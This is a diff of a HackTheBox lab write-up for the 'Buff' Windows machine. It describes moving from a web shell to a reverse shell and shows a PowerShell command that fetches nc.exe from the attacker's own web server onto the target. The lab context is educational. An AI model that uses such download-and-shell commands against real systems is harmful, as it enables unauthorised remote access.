ryanrestine/HackTheBox_WriteUps/windows_machines/buff_notes.md

 This web-shell is not the best to work out of, so I'm going to create a reverse shell from the web-shell back to my machine, so I can enumerate more comfortably.

 To do this I'll need to transfer a netcat executable to the target machine.
-First I'll set up a python webserver and on the target box fetch netcat with
+First I'll set up a Python webserver and on the target box fetch netcat with:

 ```text
 powershell -c iwr http://10.10.14.28/nc.exe -outfile nc.exe"